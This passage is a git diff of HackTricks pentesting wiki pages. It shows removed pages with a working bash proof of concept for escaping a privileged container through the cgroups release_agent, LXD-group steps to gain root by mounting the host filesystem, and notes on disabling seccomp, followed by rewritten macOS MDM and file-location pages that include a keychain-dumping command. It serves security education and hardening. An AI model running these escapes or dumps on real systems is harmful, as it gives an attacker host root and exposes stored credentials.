-```bash -root@host:~$ COUNTER=1 -root@host:~$ while [ ! -f /proc/${COUNTER}/root/findme ]; do COUNTER=$((${COUNTER} + 1)); done -root@host:~$ echo ${COUNTER} -7822 -root@host:~$ cat /proc/${COUNTER}/root/findme -findme -``` - -### Putting it All Together - -To complete this attack the brute force technique can be used to guess the pid for the path `/proc//root/payload.sh`, with each iteration writing the guessed pid path to the cgroups `release_agent` file, triggering the `release_agent`, and seeing if an output file is created. - -The only caveat with this technique is it is in no way shape or form subtle, and can increase the pid count very high. As no long running processes are kept running this _should_ not cause reliability issues, but don’t quote me on that. - -The below PoC implements these techniques to provide a more generic attack than first presented in Felix’s original PoC for escaping a privileged container using the cgroups `release_agent` functionality: - -```bash -#!/bin/sh - -OUTPUT_DIR="/" -MAX_PID=65535 -CGROUP_NAME="xyx" -CGROUP_MOUNT="/tmp/cgrp" -PAYLOAD_NAME="${CGROUP_NAME}_payload.sh" -PAYLOAD_PATH="${OUTPUT_DIR}/${PAYLOAD_NAME}" -OUTPUT_NAME="${CGROUP_NAME}_payload.out" -OUTPUT_PATH="${OUTPUT_DIR}/${OUTPUT_NAME}" - -# Run a process for which we can search for (not needed in reality, but nice to have) -sleep 10000 & - -# Prepare the payload script to execute on the host -cat > ${PAYLOAD_PATH} << __EOF__ -#!/bin/sh - -OUTPATH=\$(dirname \$0)/${OUTPUT_NAME} - -# Commands to run on the host< -ps -eaf > \${OUTPATH} 2>&1 -__EOF__ - -# Make the payload script executable -chmod a+x ${PAYLOAD_PATH} - -# Set up the cgroup mount using the memory resource cgroup controller -mkdir ${CGROUP_MOUNT} -mount -t cgroup -o memory cgroup ${CGROUP_MOUNT} -mkdir ${CGROUP_MOUNT}/${CGROUP_NAME} -echo 1 > ${CGROUP_MOUNT}/${CGROUP_NAME}/notify_on_release - -# Brute force the host pid until the output path is created, or we run out of guesses -TPID=1 -while [ ! -f ${OUTPUT_PATH} ] -do - if [ $((${TPID} % 100)) -eq 0 ] - then - echo "Checking pid ${TPID}" - if [ ${TPID} -gt ${MAX_PID} ] - then - echo "Exiting at ${MAX_PID} :-(" - exit 1 - fi - fi - # Set the release_agent path to the guessed pid - echo "/proc/${TPID}/root${PAYLOAD_PATH}" > ${CGROUP_MOUNT}/release_agent - # Trigger execution of the release_agent - sh -c "echo \$\$ > ${CGROUP_MOUNT}/${CGROUP_NAME}/cgroup.procs" - TPID=$((${TPID} + 1)) -done - -# Wait for and cat the output -sleep 1 -echo "Done! Output:" -cat ${OUTPUT_PATH} -``` - -Executing the PoC within a privileged container should provide output similar to: - -```bash -root@container:~$ ./release_agent_pid_brute.sh -Checking pid 100 -Checking pid 200 -Checking pid 300 -Checking pid 400 -Checking pid 500 -Checking pid 600 -Checking pid 700 -Checking pid 800 -Checking pid 900 -Checking pid 1000 -Checking pid 1100 -Checking pid 1200 - -Done! Output: -UID PID PPID C STIME TTY TIME CMD -root 1 0 0 11:25 ? 00:00:01 /sbin/init -root 2 0 0 11:25 ? 00:00:00 [kthreadd] -root 3 2 0 11:25 ? 00:00:00 [rcu_gp] -root 4 2 0 11:25 ? 00:00:00 [rcu_par_gp] -root 5 2 0 11:25 ? 00:00:00 [kworker/0:0-events] -root 6 2 0 11:25 ? 00:00:00 [kworker/0:0H-kblockd] -root 9 2 0 11:25 ? 00:00:00 [mm_percpu_wq] -root 10 2 0 11:25 ? 00:00:00 [ksoftirqd/0] -... -``` - -# Use containers securely - -Docker restricts and limits containers by default. Loosening these restrictions may create security issues, even without the full power of the `--privileged` flag. It is important to acknowledge the impact of each additional permission, and limit permissions overall to the minimum necessary. - -To help keep containers secure: - -* Do not use the `--privileged` flag or mount a [Docker socket inside the container](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/). The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag. -* Do not run as root inside the container. Use a [different user](https://docs.docker.com/develop/develop-images/dockerfile_best-practices/#user) or [user namespaces](https://docs.docker.com/engine/security/userns-remap/). The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups. -* [Drop all capabilities](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) \(`--cap-drop=all`\) and enable only those that are required \(`--cap-add=...`\). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack. -* [Use the β€œno-new-privileges” security option](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) to prevent processes from gaining more privileges, for example through suid binaries. -* [Limit resources available to the container](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources). Resource limits can protect the machine from denial of service attacks. -* Adjust [seccomp](https://docs.docker.com/engine/security/seccomp/), [AppArmor](https://docs.docker.com/engine/security/apparmor/) \(or SELinux\) profiles to restrict the actions and syscalls available for the container to the minimum required. -* Use [official docker images](https://docs.docker.com/docker-hub/official_images/) or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. -* Regularly rebuild your images to apply security patches. This goes without saying. - -# References - -* [https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/) -* [https://twitter.com/\_fel1x/status/1151487051986087936](https://twitter.com/_fel1x/status/1151487051986087936) -* [https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html](https://ajxchapman.github.io/containers/2020/11/19/privileged-container-escape.html) - - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - diff --git a/linux-unix/privilege-escalation/lxd-privilege-escalation.md b/linux-unix/privilege-escalation/lxd-privilege-escalation.md deleted file mode 100644 index 28bff9434..000000000 --- a/linux-unix/privilege-escalation/lxd-privilege-escalation.md +++ /dev/null @@ -1,100 +0,0 @@ - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - -If you belong to _**lxd**_ **or** _**lxc**_ **group**, you can become root - -# Exploiting without internet - -You can install in your machine this distro builder: [https://github.com/lxc/distrobuilder ](https://github.com/lxc/distrobuilder)\(follow the instructions of the github\): - -```bash -#Install requirements -sudo apt update -sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools -#Clone repo -go get -d -v github.com/lxc/distrobuilder -#Make distrobuilder -cd $HOME/go/src/github.com/lxc/distrobuilder -make -cd -#Prepare the creation of alpine -mkdir -p $HOME/ContainerImages/alpine/ -cd $HOME/ContainerImages/alpine/ -wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml -#Create the container -sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -``` - -Then, upload to the server the files **lxd.tar.xz** and **rootfs.squashfs** - -Add the image: - -```bash -lxc image import lxd.tar.xz rootfs.squashfs --alias alpine -lxc image list #You can see your new imported image -``` - -Create a container and add root path - -```bash -lxc init alpine privesc -c security.privileged=true -lxc list #List containers - -lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true -``` - -Execute the container: - -```bash -lxc start privesc -lxc exec privesc /bin/sh -[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted -``` - -# With internet - -You can follow [these instructions](https://reboare.github.io/lxd/lxd-escape.html). - -```bash -lxc init ubuntu:16.04 test -c security.privileged=true -lxc config device add test whatever disk source=/ path=/mnt/root recursive=true -lxc start test -lxc exec test bash -[email protected]:~# cd /mnt/root #Here is where the filesystem is mounted -``` - -# Other Refs - -{% embed url="https://reboare.github.io/lxd/lxd-escape.html" caption="" %} - - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - diff --git a/linux-unix/privilege-escalation/seccomp.md b/linux-unix/privilege-escalation/seccomp.md deleted file mode 100644 index 5419e9bc0..000000000 --- a/linux-unix/privilege-escalation/seccomp.md +++ /dev/null @@ -1,164 +0,0 @@ - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - -# Basic Information - -**Seccomp **or Secure Computing mode, in summary, is a feature of Linux kernel which can act as **syscall filter**.\ -Seccomp has 2 modes. - -**seccomp** (short for **secure computing mode**) is a computer security facility in the **Linux** **kernel**. seccomp allows a process to make a one-way transition into a "secure" state where **it cannot make any system calls except** `exit()`, `sigreturn()`, `read()` and `write()` to **already-open** file descriptors. Should it attempt any other system calls, the **kernel** will **terminate** the **process** with SIGKILL or SIGSYS. In this sense, it does not virtualize the system's resources but isolates the process from them entirely. - -seccomp mode is **enabled via the `prctl(2)` system call** using the `PR_SET_SECCOMP` argument, or (since Linux kernel 3.17) via the `seccomp(2)` system call. seccomp mode used to be enabled by writing to a file, `/proc/self/seccomp`, but this method was removed in favor of `prctl()`. In some kernel versions, seccomp disables the `RDTSC` x86 instruction, which returns the number of elapsed processor cycles since power-on, used for high-precision timing. - -**seccomp-bpf** is an extension to seccomp that allows **filtering of system calls using a configurable policy** implemented using Berkeley Packet Filter rules. It is used by OpenSSH and vsftpd as well as the Google Chrome/Chromium web browsers on Chrome OS and Linux. (In this regard seccomp-bpf achieves similar functionality, but with more flexibility and higher performance, to the older systraceβ€”which seems to be no longer supported for Linux.) - -## **Original/Strict Mode** - -In this mode** **Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL - -{% code title="seccomp_strict.c" %} -```c -#include -#include -#include -#include -#include -#include - -//From https://sysdig.com/blog/selinux-seccomp-falco-technical-discussion/ -//gcc seccomp_strict.c -o seccomp_strict - -int main(int argc, char **argv) -{ - int output = open("output.txt", O_WRONLY); - const char *val = "test"; - - //enables strict seccomp mode - printf("Calling prctl() to set seccomp strict mode...\n"); - prctl(PR_SET_SECCOMP, SECCOMP_MODE_STRICT); - - //This is allowed as the file was already opened - printf("Writing to an already open file...\n"); - write(output, val, strlen(val)+1); - - //This isn't allowed - printf("Trying to open file for reading...\n"); - int input = open("output.txt", O_RDONLY); - - printf("You will not see this message--the process will be killed first\n"); -} -``` -{% endcode %} - -## Seccomp-bpf - -This mode allows f**iltering of system calls using a configurable policy** implemented using Berkeley Packet Filter rules. - -{% code title="seccomp_bpf.c" %} -```c -#include -#include -#include -#include - -//https://security.stackexchange.com/questions/168452/how-is-sandboxing-implemented/175373 -//gcc seccomp_bpf.c -o seccomp_bpf -lseccomp - -void main(void) { - /* initialize the libseccomp context */ - scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL); - - /* allow exiting */ - printf("Adding rule : Allow exit_group\n"); - seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0); - - /* allow getting the current pid */ - //printf("Adding rule : Allow getpid\n"); - //seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(getpid), 0); - - printf("Adding rule : Deny getpid\n"); - seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(getpid), 0); - /* allow changing data segment size, as required by glibc */ - printf("Adding rule : Allow brk\n"); - seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(brk), 0); - - /* allow writing up to 512 bytes to fd 1 */ - printf("Adding rule : Allow write upto 512 bytes to FD 1\n"); - seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 2, - SCMP_A0(SCMP_CMP_EQ, 1), - SCMP_A2(SCMP_CMP_LE, 512)); - - /* if writing to any other fd, return -EBADF */ - printf("Adding rule : Deny write to any FD except 1 \n"); - seccomp_rule_add(ctx, SCMP_ACT_ERRNO(EBADF), SCMP_SYS(write), 1, - SCMP_A0(SCMP_CMP_NE, 1)); - - /* load and enforce the filters */ - printf("Load rules and enforce \n"); - seccomp_load(ctx); - seccomp_release(ctx); - //Get the getpid is denied, a weird number will be returned like - //this process is -9 - printf("this process is %d\n", getpid()); -} -``` -{% endcode %} - -# Seccomp in Docker - -**Seccomp-bpf** is supported by **Docker **to restrict the **syscalls **from the containers effectively decreasing the surface area. You can find the **syscalls blocked **by **default **in [https://docs.docker.com/engine/security/seccomp/](https://docs.docker.com/engine/security/seccomp/) and the **default seccomp profile **can be found here [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json).\ -You can run a docker container with a **different seccomp** policy with: - -```bash -docker run --rm \ - -it \ - --security-opt seccomp=/path/to/seccomp/profile.json \ - hello-world -``` - -If you want for example to **forbid **a container of executing some **syscall **like` uname` you could download the default profile from [https://github.com/moby/moby/blob/master/profiles/seccomp/default.json](https://github.com/moby/moby/blob/master/profiles/seccomp/default.json) and just **remove the `uname` string from the list**.\ -If you want to make sure that **some binary doesn't work inside a a docker container** you could use strace to list the syscalls the binary is using and then forbid them.\ -In the following example the **syscalls **of `uname` are discovered: - -```bash -docker run -it --security-opt seccomp=default.json modified-ubuntu strace uname -``` - -{% hint style="info" %} -If you are using **Docker just to launch an application**, you can **profile** it with **`strace`** and **just allow the syscalls** it needs -{% endhint %} - -## Deactivate it in Docker - -Launch a container with the flag: **`--security-opt seccomp=unconfined`** - - -
- -Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! - -Other ways to support HackTricks: - -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
- - diff --git a/macos-hardening/macos-red-teaming/macos-mdm/README.md b/macos-hardening/macos-red-teaming/macos-mdm/README.md index 3a10241e1..210a0d00a 100644 --- a/macos-hardening/macos-red-teaming/macos-mdm/README.md +++ b/macos-hardening/macos-red-teaming/macos-mdm/README.md @@ -14,28 +14,32 @@ Other ways to support HackTricks: +**To learn about macOS MDMs check:** + +* [https://www.youtube.com/watch?v=ku8jZe-MHUU](https://www.youtube.com/watch?v=ku8jZe-MHUU) +* [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe) + ## Basics -### What is MDM (Mobile Device Management)? +### **MDM (Mobile Device Management) Overview** +[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile_device_management) (MDM) is utilized for overseeing various end-user devices like smartphones, laptops, and tablets. Particularly for Apple's platforms (iOS, macOS, tvOS), it involves a set of specialized features, APIs, and practices. The operation of MDM hinges on a compatible MDM server, which is either commercially available or open-source, and must support the [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). Key points include: -[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile\_device\_management) (MDM) is a technology commonly used to **administer end-user computing devices** such as mobile phones, laptops, desktops and tablets. In the case of Apple platforms like iOS, macOS and tvOS, it refers to a specific set of features, APIs and techniques used by administrators to manage these devices. Management of devices via MDM requires a compatible commercial or open-source MDM server that implements support for the [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). +- Centralized control over devices. +- Dependence on an MDM server that adheres to the MDM protocol. +- Capability of the MDM server to dispatch various commands to devices, for instance, remote data erasure or configuration installation. -* A way to achieve **centralized device management** -* Requires an **MDM server** which implements support for the MDM protocol -* MDM server can **send MDM commands**, such as remote wipe or β€œinstall this config” +### **Basics of DEP (Device Enrollment Program)** +The [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP_Guide.pdf) (DEP) offered by Apple streamlines the integration of Mobile Device Management (MDM) by facilitating zero-touch configuration for iOS, macOS, and tvOS devices. DEP automates the enrollment process, allowing devices to be operational right out of the box, with minimal user or administrative intervention. Essential aspects include: -### Basics What is DEP (Device Enrolment Program)? +- Enables devices to autonomously register with a pre-defined MDM server upon initial activation. +- Primarily beneficial for brand-new devices, but also applicable for devices undergoing reconfiguration. +- Facilitates a straightforward setup, making devices ready for organizational use swiftly. -The [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP\_Guide.pdf) (DEP) is a service offered by Apple that **simplifies** Mobile Device Management (MDM) **enrollment** by offering **zero-touch configuration** of iOS, macOS, and tvOS devices. Unlike more traditional deployment methods, which require the end-user or administrator to take action to configure a device, or manually enroll with an MDM server, DEP aims to bootstrap this process, **allowing the user to unbox a new Apple device and have it configured for use in the organization almost immediately**. - -Administrators can leverage DEP to automatically enroll devices in their organization’s MDM server. Once a device is enrolled, **in many cases it is treated as a β€œtrusted”** device owned by the organization, and could receive any number of certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf). - -* Allows a device to automatically enroll in pre-configured MDM server the **first time it’s powered** on -* Most useful when the **device** is **brand new** -* Can also be useful for **reprovisioning** workflows (**wiped** with fresh install of the OS) +### **Security Consideration** +It's crucial to note that the ease of enrollment provided by DEP, while beneficial, can also pose security risks. If protective measures are not adequately enforced for MDM enrollment, attackers might exploit this streamlined process to register their device on the organization's MDM server, masquerading as a corporate device. {% hint style="danger" %} -Unfortunately, if an organization has not taken additional steps to **protect their MDM enrollment**, a simplified end-user enrollment process through DEP can also mean a simplified process for **attackers to enroll a device of their choosing in the organization’s MDM** server, assuming the "identity" of a corporate device. +**Security Alert**: Simplified DEP enrollment could potentially allow unauthorized device registration on the organization's MDM server if proper safeguards are not in place. {% endhint %} ### Basics What is SCEP (Simple Certificate Enrolment Protocol)? @@ -207,10 +211,6 @@ Therefore, this could be a dangerous entrypoint for attackers if the enrolment p [enrolling-devices-in-other-organisations.md](enrolling-devices-in-other-organisations.md) {% endcontent-ref %} -## **References** - -* [https://www.youtube.com/watch?v=ku8jZe-MHUU](https://www.youtube.com/watch?v=ku8jZe-MHUU) -* [https://duo.com/labs/research/mdm-me-maybe](https://duo.com/labs/research/mdm-me-maybe)
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md index c3e61d9ac..d26b4e048 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/README.md @@ -78,7 +78,7 @@ MacOS stores information such as passwords in several places: ### macOS Bundles -Basically, a bundle is a **directory structure** within the file system. Interestingly, by default this directory **looks like a single object in Finder** (like `.app`). +A bundle is a **directory** which **looks like an object in Finder** (a Bundle example are `*.app` files). {% content-ref url="macos-bundles.md" %} [macos-bundles.md](macos-bundles.md) @@ -196,14 +196,12 @@ Mac OS binaries usually are compiled as **universal binaries**. A **universal bi ## Risk Category Files Mac OS -The files `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` contains the risk associated to files depending on the file extension. +The directory `/System/Library/CoreServices/CoreTypes.bundle/Contents/Resources/System` is where information about the **risk associated with different file extensions is stored**. This directory categorizes files into various risk levels, influencing how Safari handles these files upon download. The categories are as follows: -The possible categories include the following: - -* **LSRiskCategorySafe**: **Totally** **safe**; Safari will auto-open after download -* **LSRiskCategoryNeutral**: No warning, but **not auto-opened** -* **LSRiskCategoryUnsafeExecutable**: **Triggers** a **warning** β€œThis file is an application...” -* **LSRiskCategoryMayContainUnsafeExecutable**: This is for things like archives that contain an executable. It **triggers a warning unless Safari can determine all the contents are safe or neutral**. +- **LSRiskCategorySafe**: Files in this category are considered **completely safe**. Safari will automatically open these files after they are downloaded. +- **LSRiskCategoryNeutral**: These files come with no warnings and are **not automatically opened** by Safari. +- **LSRiskCategoryUnsafeExecutable**: Files under this category **trigger a warning** indicating that the file is an application. This serves as a security measure to alert the user. +- **LSRiskCategoryMayContainUnsafeExecutable**: This category is for files, such as archives, that might contain an executable. Safari will **trigger a warning** unless it can verify that all contents are safe or neutral. ## Log files diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md index 20b76f8ae..23795c1f0 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-bundles.md @@ -16,35 +16,48 @@ Other ways to support HackTricks: ## Basic Information -Basically, a bundle is a **directory structure** within the file system. Interestingly, by default this directory **looks like a single object in Finder**. +Bundles in macOS serve as containers for a variety of resources including applications, libraries, and other necessary files, making them appear as single objects in Finder, such as the familiar `*.app` files. The most commonly encountered bundle is the `.app` bundle, though other types like `.framework`, `.systemextension`, and `.kext` are also prevalent. -The **common** frequent bundle we will encounter is the **`.app` bundle**, but many other executables are also packaged as bundles, such as **`.framework`** and **`.systemextension`** or **`.kext`**. +### Essential Components of a Bundle -The types of resources contained within a bundle may consist of applications, libraries, images, documentation, header files, etc. All these files are inside `.app/Contents/` +Within a bundle, particularly within the `.app/Contents/` directory, a variety of important resources are housed: -```bash +- **_CodeSignature**: This directory stores code-signing details vital for verifying the integrity of the application. You can inspect the code-signing information using commands like: + %%%bash + openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64 + %%% +- **MacOS**: Contains the executable binary of the application that runs upon user interaction. +- **Resources**: A repository for the application's user interface components including images, documents, and interface descriptions (nib/xib files). +- **Info.plist**: Acts as the application's main configuration file, crucial for the system to recognize and interact with the application appropriately. + +#### Important Keys in Info.plist + +The `Info.plist` file is a cornerstone for application configuration, containing keys such as: + +- **CFBundleExecutable**: Specifies the name of the main executable file located in the `Contents/MacOS` directory. +- **CFBundleIdentifier**: Provides a global identifier for the application, used extensively by macOS for application management. +- **LSMinimumSystemVersion**: Indicates the minimum version of macOS required for the application to run. + +### Exploring Bundles + +To explore the contents of a bundle, such as `Safari.app`, the following command can be used: +%%%bash ls -lR /Applications/Safari.app/Contents -``` +%%% -* `Contents/_CodeSignature` -> Contains **code-signing information** about the application (i.e., hashes, etc.). - * `openssl dgst -binary -sha1 /Applications/Safari.app/Contents/Resources/Assets.car | openssl base64` -* `Contents/MacOS` -> Contains the **application’s binary** (which is executed when the user double-clicks the application icon in the UI). -* `Contents/Resources` -> Contains **UI elements of the application**, such as images, documents, and nib/xib files (that describe various user interfaces). -* `Contents/Info.plist` -> The application’s main β€œ**configuration file.**” Apple notes that β€œthe system relies on the presence of this file to identify relevant information about \[the] application and any related files”. - * **Plist** **files** contains configuration information. You can find find information about the meaning of they plist keys in [https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html) - * Pairs that may be of interest when analyzing an application include:\\ +This exploration reveals directories like `_CodeSignature`, `MacOS`, `Resources`, and files like `Info.plist`, each serving a unique purpose from securing the application to defining its user interface and operational parameters. - * **CFBundleExecutable** +#### Additional Bundle Directories - Contains the **name of the application’s binary** (found in Contents/MacOS). +Beyond the common directories, bundles may also include: - * **CFBundleIdentifier** +- **Frameworks**: Contains bundled frameworks used by the application. +- **PlugIns**: A directory for plug-ins and extensions that enhance the application's capabilities. +- **XPCServices**: Holds XPC services used by the application for out-of-process communication. - Contains the application’s bundle identifier (often used by the system to **globally** **identify** the application). +This structure ensures that all necessary components are encapsulated within the bundle, facilitating a modular and secure application environment. - * **LSMinimumSystemVersion** - - Contains the **oldest** **version** of **macOS** that the application is compatible with. +For more detailed information on `Info.plist` keys and their meanings, the Apple developer documentation provides extensive resources: [Apple Info.plist Key Reference](https://developer.apple.com/library/archive/documentation/General/Reference/InfoPlistKeyReference/Introduction/Introduction.html).
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md index 00288324e..06b1538e4 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md @@ -18,14 +18,21 @@ Other ways to support HackTricks: ### Swap Files -* **`/private/var/vm/swapfile0`**: This file is used as a **cache when physical memory fills up**. Data in physical memory will be pushed to the swapfile and then swapped back into physical memory if it’s needed again. More than one file can exist in here. For example, you might see swapfile0, swapfile1, and so on. -* **`/private/var/vm/sleepimage`**: When OS X goes into **hibernation**, **data stored in memory is put into the sleepimage file**. When the user comes back and wakes the computer, memory is restored from the sleepimage and the user can pick up where they left off. +Swap files, such as `/private/var/vm/swapfile0`, serve as **caches when the physical memory is full**. When there's no more room in physical memory, its data is transferred to a swap file and then brought back to physical memory as needed. Multiple swap files might be present, with names like swapfile0, swapfile1, and so on. - By default in modern MacOS systems this file will be encrypted, so it might be not recuperable. +### Hibernate Image - * However, the encryption of this file might be disabled. Check the out of `sysctl vm.swapusage`. +The file located at `/private/var/vm/sleepimage` is crucial during **hibernation mode**. **Data from memory is stored in this file when OS X hibernates**. Upon waking the computer, the system retrieves memory data from this file, allowing the user to continue where they left off. -### Dumping memory with osxpmem +It's worth noting that on modern MacOS systems, this file is typically encrypted for security reasons, making recovery difficult. + +* To check if encryption is enabled for the sleepimage, the command `sysctl vm.swapusage` can be run. This will show if the file is encrypted. + +### Memory Pressure Logs + +Another important memory-related file in MacOS systems is the **memory pressure log**. These logs are located in `/var/log` and contain detailed information about the system's memory usage and pressure events. They can be particularly useful for diagnosing memory-related issues or understanding how the system manages memory over time. + +## Dumping memory with osxpmem In order to dump the memory in a MacOS machine you can use [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip). diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md index 6df41a977..0cc5888cd 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.md @@ -56,20 +56,23 @@ security dump-keychain -d #Dump all the info, included secrets (the user will be Based on this comment [juuso/keychaindump#10 